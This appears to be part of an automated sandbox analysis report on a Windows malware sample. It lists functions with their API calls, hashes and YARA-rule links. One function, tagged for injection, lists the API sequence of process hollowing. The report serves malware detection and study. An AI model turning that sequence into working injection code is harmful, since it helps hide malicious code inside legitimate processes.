                                          • Opcode ID: 37700dd88deea54bdcb2886b04f3ff1d4b1f1d2d827f433a59b2a57d76293111
                                          • Instruction ID: 621c955d13fcd7d2b484d90eccd4f4c91f229b73dc9692974285424c2f4418c7
                                          • Opcode Fuzzy Hash: 37700dd88deea54bdcb2886b04f3ff1d4b1f1d2d827f433a59b2a57d76293111
                                          • Instruction Fuzzy Hash: 2C016772C04119AEDF41AFE89C427EE7FF4AF04320F144166F814E61D1EA758AE0E790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F126FF, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F1275E
                                            • Part of subcall function 00F17645: DeleteFileW.KERNEL32(00F12752,?,00F12752,?,?,?,?), ref: 00F1764D
                                            • Part of subcall function 00F17645: GetLastError.KERNEL32(?,00F12752,?,?,?,?), ref: 00F17657
                                            • Part of subcall function 00F17645: __dosmaperr.LIBCMT ref: 00F1765E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: DeleteErrorFileLast__dosmaperr_free
                                          • String ID:
                                          • API String ID: 3353641461-0
                                          • Opcode ID: 9ae0e19ef64f5093953115a5dba9c7d0d6d348911aef452eb829f6ac0bb9f163
                                          • Instruction ID: 13b9d6e4e27a1fa67608981e07f1fa68c1fd30935b9b6078a49975cea0c5934e
                                          • Opcode Fuzzy Hash: 9ae0e19ef64f5093953115a5dba9c7d0d6d348911aef452eb829f6ac0bb9f163
                                          • Instruction Fuzzy Hash: B501A971D04219AEDF40BBF89C417EEBFF4AF04324F140166E419E21D1E6748AD0E790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1DB6A, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 24e3c007ec57d6ebd588f531e7a99f6d1e537632e71a79deff46e0281b5a7d00
                                          • Instruction ID: a54f8343276489a148bdde3311cb7676539da1b74c27021da93d745647bda84e
                                          • Opcode Fuzzy Hash: 24e3c007ec57d6ebd588f531e7a99f6d1e537632e71a79deff46e0281b5a7d00
                                          • Instruction Fuzzy Hash: 96014F72C05159BFCF41EFE88C019EE7FB5AF48310F144165F915E21A1E7358AA0EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1AD8F, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F17094,00000001,00000364,00000006,000000FF,?,?,00F0FD13,00F0E3EC,?,00F0EC38,E800F311), ref: 00F1ADD0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 25929936b48536b648c1286eeda2222404b58cbb2042fdcad6c52614b991eaea
                                          • Instruction ID: 28c8627ed4d2aba7671360a50ec6ceddcdd39a693514a8d72b3270d76b0002c0
                                          • Opcode Fuzzy Hash: 25929936b48536b648c1286eeda2222404b58cbb2042fdcad6c52614b991eaea
                                          • Instruction Fuzzy Hash: 03F05932A03E286ADB217A32AC01BEB3B58AF81772F044011FC14D69C1CB30DC80B2E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F16AEA, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00F0E3EC,?,?,00F0FD13,00F0E3EC,?,00F0EC38,E800F311,73B76490), ref: 00F16B1C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5c4a35ab18c5bd6a3ab8b0245ac95da4feb3df795e8f5b851bcad819724537d6
                                          • Instruction ID: 4b8f51261dc7c2c5b17d4d58ef12ccdd84e4079c1dad5a1289a056c628cd3b46
                                          • Opcode Fuzzy Hash: 5c4a35ab18c5bd6a3ab8b0245ac95da4feb3df795e8f5b851bcad819724537d6
                                          • Instruction Fuzzy Hash: B5E0E532649215AADA30A6659C00FDA3A88AFC13B4F010128FC04D6190DB64EC81B1E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1D8B1, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000000,?,00F1DCA1,?,?,00000000,?,00F1DCA1,00000000,0000000C), ref: 00F1D8CE
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ce8c9ceaf84ea3b92a7f0c2ab71d5b65cbe47a55ad142398dd6e45a7235af084
                                          • Instruction ID: 55060a1dabbd20b4a53bca426bd4b20c79d125fc3f166ad4cfc500d63973d7b6
                                          • Opcode Fuzzy Hash: ce8c9ceaf84ea3b92a7f0c2ab71d5b65cbe47a55ad142398dd6e45a7235af084
                                          • Instruction Fuzzy Hash: 4BD06C3200020DBFDF129F84DC06EDA3BAAFB48714F014000BA1856020C732E872EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F0E3D0, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 94ae47ff2c08dcbf8751c8e42576d6e5234351b8dfde5610a1a1499504b7ff23
                                          • Instruction ID: a446f5e894d17075075cc3191365503f50a6b44474bf149bdef88022a5257a70
                                          • Opcode Fuzzy Hash: 94ae47ff2c08dcbf8751c8e42576d6e5234351b8dfde5610a1a1499504b7ff23
                                          • Instruction Fuzzy Hash: 89E0129AF40120A7C45832BD1D3763E7D156AD2774B950598EC422B3D7ED89191533D3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F0E470, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 5a4898950d2e0d8d25b271f65779db50f47d680439f883410552dce105919166
                                          • Instruction ID: 0753b744bd25051a61ddc6927462e5de12b5635105cba7e8e2ccd7619a628ea0
                                          • Opcode Fuzzy Hash: 5a4898950d2e0d8d25b271f65779db50f47d680439f883410552dce105919166
                                          • Instruction Fuzzy Hash: 9BE0C25AF00120A3C81432BD1C3753E38151AC2774B840588EC422B3D7ED8C091133E3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F0E420, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 6c532a2349a433098671f4ba20a66b869f4f7c9822ecbfe03b4e5adedcfeec78
                                          • Instruction ID: dc21e6b8909a830cd80cc4203b810c99af166f698472d69a25d502c9ed4771ba
                                          • Opcode Fuzzy Hash: 6c532a2349a433098671f4ba20a66b869f4f7c9822ecbfe03b4e5adedcfeec78
                                          • Instruction Fuzzy Hash: 7FE0C25AF4002063C404327D0D3353E78151AC2734B84098CEC422B3D7ED89091133E3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00F02250, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 00F0226C
                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00F022C5
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00F022DE
                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00F022F3
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00F02316
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 00F0232E
                                          • GetProcAddress.KERNEL32(00000000), ref: 00F02335
                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00F02354
                                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00F0236F
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00F023AC
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 00F023DC
                                          • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00F023F2
                                          • ResumeThread.KERNEL32(?,?,?,00000000), ref: 00F023FB
                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 00F02409
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F02420
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                          • String ID: NtUnmapViewOfSection$ntdll.dll
                                          • API String ID: 4033543172-1050664331
                                          • Opcode ID: 907f6451f7a9b447875fda73a83489c96aea5df2ebf8b6ce685065cfee58c014
                                          • Instruction ID: 50e70a5fccd9f4fd41c1657543bc50e6b030cc12e77af2a2a1a8b38848816d37
                                          • Opcode Fuzzy Hash: 907f6451f7a9b447875fda73a83489c96aea5df2ebf8b6ce685065cfee58c014
                                          • Instruction Fuzzy Hash: 94518E71A44308BBEB20DF94DC45FAABB78FF08705F504064F608E61D0D7B4A955EB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1CB2C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 00F1CB70
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C726
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C738
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C74A
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C75C
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C76E
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C780
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C792
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7A4
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7B6
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7C8
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7DA
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7EC
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7FE
                                          • _free.LIBCMT ref: 00F1CB65
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000,00000000), ref: 00F16629
                                          • _free.LIBCMT ref: 00F1CB87
                                          • _free.LIBCMT ref: 00F1CB9C
                                          • _free.LIBCMT ref: 00F1CBA7
                                          • _free.LIBCMT ref: 00F1CBC9
                                          • _free.LIBCMT ref: 00F1CBDC
                                          • _free.LIBCMT ref: 00F1CBEA
                                          • _free.LIBCMT ref: 00F1CBF5
                                          • _free.LIBCMT ref: 00F1CC2D
                                          • _free.LIBCMT ref: 00F1CC34
                                          • _free.LIBCMT ref: 00F1CC51
                                          • _free.LIBCMT ref: 00F1CC69
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 7d97cc1aabb52b6b36abc54aa88f0023bd20341d82482195772384560fe3c5e5
                                          • Instruction ID: 5c6ee7a78e03005171ad682400deb9682bec87fec8fe31ae0543773e5ff74c16
                                          • Opcode Fuzzy Hash: 7d97cc1aabb52b6b36abc54aa88f0023bd20341d82482195772384560fe3c5e5
                                          • Instruction Fuzzy Hash: A6315B71A48340DFEB21AA79DC46BD6B3E9AF40321F104429E458DB191DF36ECD0EB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F16DDA, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F16DF0
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000,00000000), ref: 00F16629
                                          • _free.LIBCMT ref: 00F16DFC
                                          • _free.LIBCMT ref: 00F16E07
                                          • _free.LIBCMT ref: 00F16E12
                                          • _free.LIBCMT ref: 00F16E1D
                                          • _free.LIBCMT ref: 00F16E28
                                          • _free.LIBCMT ref: 00F16E33
                                          • _free.LIBCMT ref: 00F16E3E
                                          • _free.LIBCMT ref: 00F16E49
                                          • _free.LIBCMT ref: 00F16E57
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 8024a25616af8af3f6de98d5b01051ca1d673dbf2e87216e550a2446d3817259
                                          • Instruction ID: f101fec63f22d65194315aeec6bab0d25bb2c74281fb69f70e5e7b7a3ccee372
                                          • Opcode Fuzzy Hash: 8024a25616af8af3f6de98d5b01051ca1d673dbf2e87216e550a2446d3817259
                                          • Instruction Fuzzy Hash: 69215476900108EFCB41EF94C881DDEBBB9AF08355B0141A6F915DB162DB36EA94AB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1A84A, Relevance: 13.8, APIs: 9, Instructions: 301COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2552bff0ccd2b7e8b1c9b39f0e61407153ad4b16057c9b8318243991ac04f4b4
                                          • Instruction ID: da6670550e540ab0810be6c30fb7faf53a944ae4ef4f27a5d31d66e33d60f8c2
                                          • Opcode Fuzzy Hash: 2552bff0ccd2b7e8b1c9b39f0e61407153ad4b16057c9b8318243991ac04f4b4
                                          • Instruction Fuzzy Hash: 17C10870E092899FDB15DF98CC81BEDBBB2BF89320F044059E514A7291D7359DC2EB22
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F10A40, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00F10A77
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00F10A7F
                                          • _ValidateLocalCookies.LIBCMT ref: 00F10B08
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00F10B33
                                          • _ValidateLocalCookies.LIBCMT ref: 00F10B88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm$csm
                                          • API String ID: 1170836740-3733052814
                                          • Opcode ID: 0c2710ed502369074039e46c9a34329ffd2b48d0633dc0e02a70628e46c7f6af
                                          • Instruction ID: d84df8460821d063720e7eb7143c9512b3e62687f3607e7eb69ed6ed91900517
                                          • Opcode Fuzzy Hash: 0c2710ed502369074039e46c9a34329ffd2b48d0633dc0e02a70628e46c7f6af
                                          • Instruction Fuzzy Hash: 7051A334E00209DFCF14EF28D850ADE7BA5BF44324F1481A9E8059B392DBB5D9C6EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1BF44, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 3409252457-0
                                          • Opcode ID: f7202e189e44ffb452b7120de92189c78747feec34317cfb16401a0e1a97b16a
                                          • Instruction ID: 4f6c93195220455d7dddc8481c86e4e5919188ddb64d57934aa37be95d890888
                                          • Opcode Fuzzy Hash: f7202e189e44ffb452b7120de92189c78747feec34317cfb16401a0e1a97b16a
                                          • Instruction Fuzzy Hash: 0251F571D84255EFDB20AFB49C42AFE7BA4AF05720F044169E510E7282EB7699C0FBD4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F171AC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 082c091e63ecc1a547019d3dd37f1d6e0de4db683b6279a7a499c91f30c30612
                                          • Instruction ID: 75b676ea6c2c3a7438d30b1b479ed4d7ff38c85734e556b356bfdc374de42676
                                          • Opcode Fuzzy Hash: 082c091e63ecc1a547019d3dd37f1d6e0de4db683b6279a7a499c91f30c30612
                                          • Instruction Fuzzy Hash: 3A21C632E0D365E7CB316A649C45EDA36789F557B0B210150FD1EA7290D670DD42BEE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1C8A8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F1C870: _free.LIBCMT ref: 00F1C895
                                          • _free.LIBCMT ref: 00F1C8F6
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000,00000000), ref: 00F16629
                                          • _free.LIBCMT ref: 00F1C901
                                          • _free.LIBCMT ref: 00F1C90C
                                          • _free.LIBCMT ref: 00F1C960
                                          • _free.LIBCMT ref: 00F1C96B
                                          • _free.LIBCMT ref: 00F1C976
                                          • _free.LIBCMT ref: 00F1C981
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 6cd0b8cb4d40afac903e53b7985856a57367b62d0dae06027e3d0fb788c86ede
                                          • Instruction ID: ae99d7b38919dfe8271687c870b6ddecb38f14b375620b11c9c92f2a55da8c6a
                                          • Opcode Fuzzy Hash: 6cd0b8cb4d40afac903e53b7985856a57367b62d0dae06027e3d0fb788c86ede
                                          • Instruction Fuzzy Hash: 171181715D0B04FAEA20B7B1CC87FCBB79D9F01710F400824B299EA052EB3AF595A6D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F18457, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,00F03D80,00000000), ref: 00F1849F
                                          • __fassign.LIBCMT ref: 00F1867E
                                          • __fassign.LIBCMT ref: 00F1869B
                                          • WriteFile.KERNEL32(?,00F03D80,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F186E3
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F18723
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F187CF
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
